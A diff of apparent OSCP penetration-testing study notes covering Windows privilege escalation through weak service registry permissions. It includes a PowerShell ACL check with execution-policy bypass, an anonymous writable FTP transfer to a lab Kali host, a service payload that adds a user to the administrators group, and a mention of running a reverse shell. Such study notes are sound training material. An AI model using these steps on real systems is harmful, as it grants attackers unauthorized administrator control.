AbdullahZuhair21/OSCP-Notes/README.md

 8- abusing service registry
 to check if you have access to the registry service
--     powershell -ep bypass
+-     PowerShell -ep bypass
 -     Get-Acl -Path hkln:\System\CurrentControlSet\service\regsvc | fl
-if you have FullControl in the Access for your user (might be NT AUTHORITY\INTERACTIVE ALLOW). you can let the service run a reverse shell or add a user to the administrator group now you need to download a file from windows to kali. use ftp server to do that
+if you have FullControl in the Access for your user (might be NT AUTHORITY\INTERACTIVE ALLOW). you can let the service run a reverse shell or add a user to the administrator group now you need to download a file from Windows to Kali.
+Use an FTP server to do that
--     python -m pyftpdlib -p 21 --write    (pip3 install pyftpdlib  #to download it) (kali) head to C:\Tools\Source and connect to kali ftp server, anonymous login, then put the windows_service.c file
+-     python -m pyftpdlib -p 21 --write    (pip3 install pyftpdlib  #to download it) (kali) head to C:\Tools\Source and connect to the kali FTP server, anonymous login, then put the windows_service.c file
 -     ftp 10.10.16.4 | username:anonymous | put windows_service.c
 edit the windows_service file and replace the system("whoami > ..") with system("cmd.exe /k net localgroup administrator user /add").
 DON'T FORGET TO COMPILE THE C FILE
 -     w64-mingw32-gcc windows_service.c -o raman.exe     (sudo apt install gcc-mingw-w64)